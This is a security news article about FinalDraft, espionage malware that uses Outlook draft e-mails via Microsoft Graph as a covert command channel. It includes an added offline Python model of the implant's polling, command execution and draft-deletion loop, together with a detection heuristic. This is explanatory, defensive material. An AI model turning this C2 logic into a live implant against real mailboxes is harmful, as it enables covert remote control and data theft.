- Security researchers have discovered a new piece of malware called FinalDraft
- It receives its commands through prepared Outlook draft e-mails
- It can exfiltrate data, run PowerShell and more
Security researchers from Elastic Security Labs have discovered a new piece of malware that abuses Outlook draft e-mail messages for data exfiltration, PowerShell execution and more.
The malware is part of a wider toolset used in a campaign tracked as REF7707, which targets government organizations in South America and Southeast Asia.
According to the researchers, the toolset includes a loader called PathLoader, the FinalDraft malware itself and further post-exploitation tools.
Attack chain
The attack starts with the victim being exposed to the loader in some way. The researchers do not detail how this happens, but the usual channels are the likely ones: phishing, social engineering, fake cracks for commercial software and the like.
The loader installs FinalDraft, which establishes a command-and-control channel through the Microsoft Graph API by using Outlook e-mail drafts. It obtains an OAuth access token from Microsoft using a refresh token embedded in its configuration and stores the token in the Windows registry, giving the attackers persistent access to the compromised endpoint without an interactive login.
The malware lets the attackers run a whole range of commands, including exfiltrating sensitive data, creating hidden network tunnels, manipulating local files, executing PowerShell and more. Once a command has been processed, the malware deletes the corresponding draft, which makes analysis even more difficult.
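To make the mechanism concrete, the following is an added example (not Elastic's code and not FinalDraft's own implementation). It models the draft-based command loop against an in-memory stand-in for Microsoft Graph so it runs offline: a refresh-token grant against the real Entra token endpoint, an operator dropping a command into a draft that is never sent, the implant polling the Drafts folder, posting a result draft and deleting the command draft, and finally a simple detector run over the recorded request log. The token and Graph endpoint URLs are real; the `cmd:`/`res:` subject prefixes, the base64 body encoding, the client ID and the fake shell output are assumptions for illustration.

```python
"""Added example: Outlook-draft C2 over Microsoft Graph, modelled offline.
Not FinalDraft's real protocol; subject prefixes, encoding and IDs are assumed."""
import base64
import uuid
from collections import Counter

TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"  # real
GRAPH = "https://graph.microsoft.com/v1.0"                                 # real
CLIENT_ID = "00000000-0000-0000-0000-000000000000"  # placeholder, assumption
CMD_PREFIX, RES_PREFIX = "cmd:", "res:"             # assumed draft-subject tags


class FakeGraph:
    """Minimal offline stand-in for the Graph draft endpoints; it also keeps a
    request log shaped like what a web proxy would see for each source."""
    def __init__(self):
        self.drafts = {}
        self.log = []  # (src, method, url)

    def request(self, method, url, body=None, token=None, src="implant"):
        self.log.append((src, method, url))
        if url == TOKEN_URL:
            # refresh_token grant: no password and no interactive sign-in needed
            assert body["grant_type"] == "refresh_token"
            return {"access_token": "eyJ." + uuid.uuid4().hex}
        assert token, "Graph calls need a bearer token"
        if method == "POST" and url == f"{GRAPH}/me/messages":
            mid = uuid.uuid4().hex
            self.drafts[mid] = dict(body, id=mid, isDraft=True)  # created, never sent
            return self.drafts[mid]
        if method == "GET" and url.startswith(f"{GRAPH}/me/mailFolders/drafts/messages"):
            return {"value": list(self.drafts.values())}  # $filter ignored by the fake
        if method == "DELETE" and url.startswith(f"{GRAPH}/me/messages/"):
            self.drafts.pop(url.rsplit("/", 1)[1], None)
            return {}
        raise ValueError(f"unhandled {method} {url}")


def get_token(graph, refresh_token, client_id):
    """Exchange the refresh token embedded in the config for an access token."""
    body = {"grant_type": "refresh_token", "refresh_token": refresh_token,
            "client_id": client_id, "scope": "Mail.ReadWrite offline_access"}
    return graph.request("POST", TOKEN_URL, body)["access_token"]


def _draft(subject, text):
    return {"subject": subject,
            "body": {"contentType": "text",
                     "content": base64.b64encode(text.encode()).decode()}}


def operator_task(graph, token, cmd):
    """Operator side: queue a command by creating (not sending) a draft."""
    draft = _draft(f"{CMD_PREFIX}{uuid.uuid4().hex[:8]}", cmd)
    return graph.request("POST", f"{GRAPH}/me/messages", draft, token, src="operator")["id"]


def implant_poll(graph, token, run):
    """Implant side: read command drafts, run them, post results, delete commands."""
    url = f"{GRAPH}/me/mailFolders/drafts/messages?$filter=startswith(subject,'{CMD_PREFIX}')"
    results = []
    for d in graph.request("GET", url, token=token)["value"]:
        if not d["subject"].startswith(CMD_PREFIX):
            continue
        cmd = base64.b64decode(d["body"]["content"]).decode()
        out = run(cmd)
        reply = _draft(f"{RES_PREFIX}{d['subject'][len(CMD_PREFIX):]}", out)
        graph.request("POST", f"{GRAPH}/me/messages", reply, token)
        graph.request("DELETE", f"{GRAPH}/me/messages/{d['id']}", token=token)  # cover tracks
        results.append((cmd, out))
    return results


def suspicious_graph_usage(log, min_drafts=2):
    """Flag an endpoint's Graph traffic that refreshes a token, creates and
    deletes drafts, but never sends mail: normal clients send what they draft.
    min_drafts is a tunable threshold, not a published indicator."""
    c = Counter()
    for src, method, url in log:
        if src != "implant":
            continue  # a proxy only sees the victim host's side
        if url == TOKEN_URL:
            c["token_refresh"] += 1
        elif method == "POST" and url == f"{GRAPH}/me/messages":
            c["draft_create"] += 1
        elif method == "DELETE" and url.startswith(f"{GRAPH}/me/messages/"):
            c["draft_delete"] += 1
        elif url.endswith("/send") or url.endswith("/sendMail"):
            c["send"] += 1
    return (c["token_refresh"] > 0 and c["draft_create"] >= min_drafts
            and c["draft_delete"] > 0 and c["send"] == 0)


# Constructed benign log: a mail client drafts a message and actually sends it.
BENIGN_LOG = [("implant", "POST", TOKEN_URL),
              ("implant", "POST", f"{GRAPH}/me/messages"),
              ("implant", "POST", f"{GRAPH}/me/messages/abc123/send")]


def demo():
    graph = FakeGraph()
    token = get_token(graph, "<refresh-token-from-config>", CLIENT_ID)
    operator_task(graph, token, "whoami")    # operator reuses the same mailbox
    operator_task(graph, token, "hostname")
    fake_shell = {"whoami": "corp\\svc_backup", "hostname": "MFA-WS-07"}  # constructed
    results = implant_poll(graph, token, lambda c: fake_shell.get(c, ""))
    remaining = [d["subject"] for d in graph.drafts.values()]
    return results, remaining, suspicious_graph_usage(graph.log)


if __name__ == "__main__":
    print(demo())
```

After one round, only the two `res:` drafts remain in the mailbox; the command drafts are gone, which is why mailbox forensics alone recovers little and why the Graph request pattern (token refresh plus draft create/delete with no send) is the more durable place to look.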
The researchers found the malware on a computer belonging to a foreign ministry in South America. After analyzing its infrastructure, Elastic also found links to victims in Southeast Asia. The campaign targets both Windows and Linux devices.
The attack has not been linked to any known threat actor, so it is unknown whether this was a state-sponsored operation. Given that the goal appears to be espionage, a nation-state actor is a reasonable assumption. An in-depth analysis, including detection mechanisms, indicators of compromise and YARA rules, can be found at this link.